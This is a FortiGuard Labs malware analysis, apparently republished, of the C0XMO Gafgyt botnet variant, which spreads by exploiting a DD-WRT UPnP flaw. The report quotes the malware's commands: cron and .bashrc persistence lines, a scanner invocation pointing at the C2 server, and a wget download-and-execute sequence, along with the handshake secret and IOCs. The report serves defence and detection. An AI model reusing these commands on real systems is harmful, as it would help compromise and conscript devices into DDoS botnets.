Affected Platforms: DD-WRT chang 2026-6-3 13:0:0 Author: feeds.fortinet.com(查看原文) 阅读量:10 收藏
Affected Platforms: DD-WRT changeset before 45723
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: High
This past March, FortiGuard Labs discovered a new Gafgyt botnet variant, C0XMO, that spreads by exploiting CVE-2021-27137. Our analysis revealed that, unlike earlier versions, this malware separates its lateral movement into a standalone Python script. This approach helps the attacker target various system architectures and device types more efficiently. Below is a detailed technical overview of its structure, propagation methods, and attack features.
The threat actor delivered the malware by exploiting CVE-2021-27137, a stack buffer overflow in the UPnP service of vulnerable DD-WRT router firmware versions. The vulnerability occurs when the SSDP parser mishandles oversized ST:uuid: values in specially crafted M-SEARCH requests sent via UDP port 1900.
Figure 1: The exploitation of the CVE-2021-27137 vulnerability
Although the attacker targeted a Japanese technology firm, the source IP address was traced to Germany. The compromised host downloaded the malware to /tmp/.cache. Our analysis revealed multiple malware samples compiled for various Linux architectures, such as ARM, MC68000, MIPS R3000, PowerPC, SuperH, Intel 80836, and AMD64.
Malware Analysis
C0XMO exhibits many traits typical of Gafgyt variants, including weak-credential brute-force attacks targeting Telnet and SSH, embedded command-injection vulnerabilities, and various DDoS attack techniques. This analysis is based on the bot.x86_64 sample.
Botnet
As soon as the C0XMO is delivered and executed on the victim host, it implements persistence mechanisms in four stages: persistence setup, self-copying, auto-start configuration, and termination of competing processes.
Persistence
The malware first checks its execution path through /proc/self/exe for persistence-related operations.
Figure 2: Checking C0XMO execution path through /proc/self/exe
It then generates multiple hidden file paths, including /tmp/.sys, /var/tmp/.sys, and /dev/shm/.sys.
Figure 3: Generating multiple hidden file paths
C0XMO copies itself to these hidden locations and sets the file permissions to 755, enabling execution. If there is a home directory, the malware also copies itself to $HOME/.sys.
Figure 4: Copying C0XMO to hidden locations and assigning file permission
The malware then creates cron jobs to run C0XMO every 15 minutes.
(crontab -l 2>/dev/null | grep -v '%s'; echo '/15 * * * %s >/dev/null 2>&1') | crontab -
Figure 5: Creating cron jobs to execute C0XMO every 15 minutes
Meanwhile, C0XMO appends execution commands to multiple shell profile files such as ~/.profile, ~/.bashrc, and ~/.bash_profile, using the hidden files created earlier.
grep -q ‘/tmp/.sys’ ~/.bashrc 2>/dev/null || echo ‘/tmp/.sys &’ >> ~/.bashrc 2>/dev/null
Figure 6: Appending execution commands to shell profile files
C0XMO can also re-execute itself if the malware process is terminated for any reason.
Figure 7: C0XMO re-executing itself when the process is terminated
Competitor Killing
After completing the previous stages, C0XMO verifies its PID and executable filename to prevent unintentional self-deletion during later cleanup operations.
Figure 8: Checking the C0XMO execution path to avoid accidental self-deletion
The malware scans all active processes in /proc, comparing their names to an internal blacklist. If a process name matches an entry on the blacklist, C0XMO immediately terminates that process.
Figure 9: Scanning all running processes under /proc
The blacklist primarily targets four categories:
- Botnet malware
- Network service applications
- Programming-related tools
- Red team utilities
Figure 10: Targeted process name blacklist
The malware then checks the executable paths of processes that have been terminated and compares them with a path blacklist. If it finds a match, C0XMO deletes the corresponding file from the system.
Figure 11: Removing malware through executable paths
Figure 12: Targeted malware path blacklist
C0XMO attempts to eliminate competing botnets run by other threat actors. It not only deletes rival malware binaries but also tries to remove associated persistence mechanisms such as cron jobs, rc.local, init.d services, system services, and shell profile scripts.
Figure 13: Eliminating potentially competing botnets
C2 Connection
After completing the local persistence setup, C0XMO establishes a connection to the C2 server at 85[.]215[.]131[.]70.
Figure 14: Establishes the connection with C2 server
C0XMO performs a custom handshake after connecting. It begins by sending a specific magic string, 669787761736865726500, together with the shared secret FS2@SA__=A23cAxs3S3@23AF@A3454DFSA0D. The server then responds with the string HANDSHAKE_OK.
Next, C0XMO sends the string BOT to identify itself as a botnet node, after which the server responds with OK.
In the final stage of the handshake, the bot sends the hexadecimal sequence FF FF FF FF 75 as the final magic value to the C2 server. The server then responds with a welcome message confirming that the handshake process has been successfully completed.
Figure 15: Sequence diagram of the C0XMO custom handshake
Command Handler
C0XMO contains a command handler that parses commands received from the C2 server. The malware primarily supports five commands: ping, stop, scan, stopscan, and attack-related commands.
The ping command is used to verify whether the infected host is still active. If the host is reachable, the bot responds with the PONG string as a heartbeat message.
Figure 16: The ping command for the heartbeat mechanism
C0XMO supports 19 different DDoS attack methods for various scenarios, as shown in the table below.
| Command | Attack Function | Attack Type |
| UDP | attack_udp_bypass | UDP Bypass Flood |
| TCP | attack_tcp_bypass | TCP Flood |
| TUP | attack_tcp_udp_bypass | Hybrid TCP + UDP Flood |
| SYN | attack_syn | TCP SYN Flood |
| VSE | attack_vse | Valve Source Engine Flood |
| DISCORD | attack_discord2 | Discord Voice UDP Flood |
| FIVEM | attack_fivem | FiveM Game Flood |
| OVHTCP | attack_ovh_tcp | OVH Bypass TCP Flood |
| OVHUDP | attack_ovh_udp | OVH Bypass UDP Flood |
| HEX | attack_hex | Hex-pattern Flood |
| NTP | attack_ntp | NTP Amplification |
| MEM | attack_memcached | Memcached Amplification |
| ICMP | attack_icmp | ICMP Flood |
| POD | attack_ping_of_death | Ping of Death |
| HTTPSTORM | attack_http_storm | HTTP Request Storm |
| HTTPIO | attack_http_io | Slow/IO Exhaustion |
| HTTPSPOOF | attack_http_spoof | HTTP Spoof Flood |
| HTTPGET | attack_http_get | HTTP GET Flood |
| HTTPCFB | attack_http_cfb | Cloudflare Bypass HTTP Flood |
Unlike traditional botnets, C0XMO isolates its scanning function into an independent Python script. The malware fetches this script from the same IP address and port—217[.]160[.]125[.]125:15527—that it uses to distribute the main C0XMO binary.
Figure 17: Downloading the scanner script from the C0XMO binary distributed IP address
The malware installs several required packages, including requests, paramiko, and beautifulsoup4.
pip3 install requests paramiko beautifulsoup4 --break-system-packages 2>/dev/null || pip3 install requests paramiko beautifulsoup4 2>/dev/null || python3 -m pip install requests paramiko beautifulsoup4 --break-system-packages 2>/dev/null
These packages are primarily used for network communication, including sending HTTP requests, receiving responses, and performing SSH- and Telnet-based interactions.
C0XMO then executes the scanner script with the following arguments.
python3 /tmp/scanner.py --rand --rand-ports 23,22,80,443,8080,5555,5511,5554,4443,81,8000,7547,8081,8443,8888 --runtime X --server 217[.]160[.]125[.]125:15527
- --rand: Enables random IP scanning
- --rand-ports: Specifies the target ports used during random scanning including 23, 22, 80, 443, 8080, 5555, 5511, 5554, 4443, 81, 8000, 7547, 8081, 8443, and 8888
- --runtime: Specifies the scanner runtime duration in seconds
- --server: Specifies the C2 server address
Figure 18: Executing the scanner script
Scanner
The scanner has around 22 functions categorized into six groups: Worker, Blacklist, Telnet, SSH, HTTP Exploit, and ADB Exploit. Its main goal is to enable lateral movement.
| Class | Function | Description |
| Main | main | Main Program |
| Worker | worker | Main Scanning and Exploitation Worker |
| load_blacklist | Load Blacklist Rules | |
| expand_wildcard_range | Expand Wildcard Ips and Ranges | |
| expand_ip_range | Expand IP Ranges | |
| parse_complex_pattern | Parse Complex Wildcard and Range Patterns | |
| Blacklist | is_blacklisted | Check Whether an IP is Blacklisted |
| load_failed_ips | Load Failed IP Addresses | |
| add_failed_ip | Add Failed IP Address | |
| random_ip | Generate Random Public IP Address | |
| detect_arch | Detect CPU Architecture | |
| Telnet | telnet_login | Telnet Weak-Credential Login |
| install_bot_telnet | Deploy Bot After Successful Telnet Login | |
| is_ssh | Detect SSH Service | |
| SSH | ssh_login | SSH Weak-Credential Login |
| install_bot_ssh | Deploy Bot After Successful SSH Login | |
| try_cves_fast | Fast HTTP Exploitation | |
| exploit_password_leak | Exploit Password Disclosure Vulnerability | |
| exploit_systools_rce | Exploit Systools Command Injection | |
| exploit_glpi_htmLawed | Exploit GLPI htmLawed RCE | |
| exploit_glpi_barcode | Exploit GLPI Barcode Injection | |
| HTTP Exploit | exploit_avtech | Exploit AVTECH DVR Vulenrability |
| exploit_nvms9000 | Exploit NVMS-9000 Vulnerability | |
| exploit_broadband | Exploit Broadband Router Vulnerability | |
| exploit_zyxel_systools | Exploit Zyxel SysTools RCE | |
| try_all_cves | Execute All HTTP Exploits | |
| ADB Exploit | adb_exploit | Exploit Android Debug Bridge (ADB) |
The scanner displays its banner upon execution.
Figure 19: Scanner banner displayed upon execution
The scanner initially loads the blacklist and failed IP entries from blacklist.txt and failed.txt. These files help prevent scanning honeypots, research institutions, known bot nodes, and previously unsuccessful or targeted IPs.
The script then creates numerous worker threads. Each thread performs the following steps:
- Retrieve a target
- Check the blacklist and failed IP. If the target is included in either list, the scanner skips it.
- Scan whether the target ports are open
- Detect the service type
- Execute Telnet, SSH, HTTP, and ADB exploitation attempts
- Deploy the C0XMO payload after successful exploitation; otherwise, add the failed target to failed.txt
Figure 20: Worker threads
The scanner performs weak password brute-force attacks on Telnet and SSH services. After successful authentication, it identifies the target host’s architecture and downloads the appropriate payload.
cd /tmp
cd /tmpwget -q http://malicious[.]server/bot.arch -O .cache
chmod 777 .cache
./.cache
rm -f .cache
Figure 21: Hard-coded weak credentials
Figure 22: Deploying C0XMO if successfully accessed
The scanner also includes numerous HTTP-based exploits for initial access, including:
- UPnP SOAP Injection (CVE-2021-27137)
- CGI Shell Injection
- HNAP SOAP Injection (CVE-2015-2051)
- DVR Command Injection
- Systools Command Injection
- GLPI htmLawed RCE (CVE-2022-35914)
- GLPI Barcode Injection
- AVTECH DVR Vulnerability (CVE-2025-34054, CVE-2016-15047)
- NVMS-9000 Vulnerability
- Broadband Router Vulnerability
- Zyxel SysTools RCE
Figure 23: HTTP-based exploitation used to achieve initial access
In addition, the scanner exploits unauthorized access vulnerabilities in the Android Debug Bridge (ADB) to compromise exposed Android-based devices.
Figure 24: Android Debug Bridge (ADB) unauthorized access vulnerabilities
Conclusion
C0XMO exhibits a considerably more advanced architecture and feature set compared to earlier IoT botnets. Its modular exploitation features, multi-phase propagation methods, and overall design suggest a greater degree of operational sophistication and complexity than typical Gafgyt malware. The distinction between its scanning and propagation parts underscores an evolution towards more adaptable and scalable botnet deployment strategies.
Organizations are strongly advised to immediately update all affected network devices and IoT systems to the latest firmware. They should also disable unnecessary remote-access services such as Telnet and UPnP, enforce robust credential policies, and continuously monitor for suspicious outbound scans or exploitation attempts. Additionally, regularly auditing of internet-facing services can help minimize the attack surface caused by known vulnerabilities and default settings.
Fortinet Protections
The malware described in this report is detected and blocked by FortiGuard Antivirus as:
ELF/Gafgyt.SORA!tr
ELF/Gafgyt.C0MOX!tr
ELF/Mirai.EGX!tr
Python/Gafgyt.C0MOX!tr
The FortiGuard AntiVirus service engine is integrated into FortiGate, FortiMail, FortiClient, and FortiEDR. Customers running these products with up-to-date signatures are protected against the malware components described in this report.
The FortiGuard Web Filtering Service blocks the C2 server.
FortiGuard Labs provides an IPS signature against attacks exploiting the following vulnerabilities:
CVE-2021-27137: 56117 DD-WRT.UPNP.CVE-2021-27137.uuid.Buffer.Overflow
CVE-2015-2051: 50772 D-Link.Devices.HNAP.SOAPAction-Header.Command.Execution.Vulnerability
CVE-2022-35914: 52227 GLPI-Project.GLPI.htmLawedTest.php.Code.Injection
CVE-2016-15047: 43635 Avtech DVR Camera Authentication bypass and Command Execution Exploit(Core impact)
CVE-2025-34054: 43635 Avtech DVR Camera Authentication bypass and Command Execution Exploit(Core impact)
Organizations seeking to strengthen foundational security awareness may also consider completing Fortinet Certified Fundamentals (FCF) training in Cybersecurity. This module is designed to help end users learn to identify and protect themselves from phishing attacks.
The FortiGuard IP Reputation and Anti-Botnet Security Service proactively blocks infrastructure associated with this campaign by correlating malicious IP intelligence collected from Fortinet’s global sensor network, CERT collaborations, MITRE, trusted industry partners, and other intelligence sources.
If you believe this or any other cybersecurity threat has impacted your organization, contact our Global FortiGuard Incident Response Team for assistance.
IOCs
Hosts
217[.]160[.]125[.]125:15527
176[.]100[.]37[.]91
85[.]215[.]131[.]70
Files
444a9d34a9f59dc7975dfabefb47d789813a4497bbac9127c4806dd816e85211
9394666007fac4014a4641fdae150c1b969ed2bc4299876318a336fd386abf59
450ea44da0c9d96a2e8f4d6bad34f1c35cd35743295b8cd2defa9f7a9884685d
d452f22dacab9785539484245c13e9cce58df23fc82eeef205684fcd196da20b
20042f1efb59c99e3addf822a3e9e5a496f0b701362df038a50a32a9f504a136
7413cbb6eab4d6b10346f71be5dd76d7cf2f4817f7776367b162f83755aefa1f
b6f835ced11059d341222eba11fff3a4672f4de47a3a4d791fad86059a2b06d4
b61a5508847a2167b737d31193dc393e92c5be2aa5141bbe4b7ea6f440fd4799
dff0edae6e8854ddd3e617054ee0bd74c696c91411f704dff60aabaec839bec9
ea44138b9701fce1b2fe13de8f9e00681c007c9adc625edc9f507f177704c2e8
3ddb67ab079509dd1e7ac77fc4cfed25a271526668c68f8a2221e96a4cc21812
f02b1d8010dac35b007796def0cbd5d0c9414df790e2b55b105c95df2f2ffa91
8fc2d35b66c692d37a85ae9d30dc5c7f06f0b3eaf01112a5a6398a1a0feb3aee
eead44c0af7ddb12cece1a6125cf213bab3c22511cd59aff9d63dcfddb7d4386
eead44c0af7ddb12cece1a6125cf213bab3c22511cd59aff9d63dcfddb7d4386
41e8e327abbf2ba721be677ad8a416a7295708257b39688a0af03275fb199cec
如有侵权请联系:admin#unsafe.sh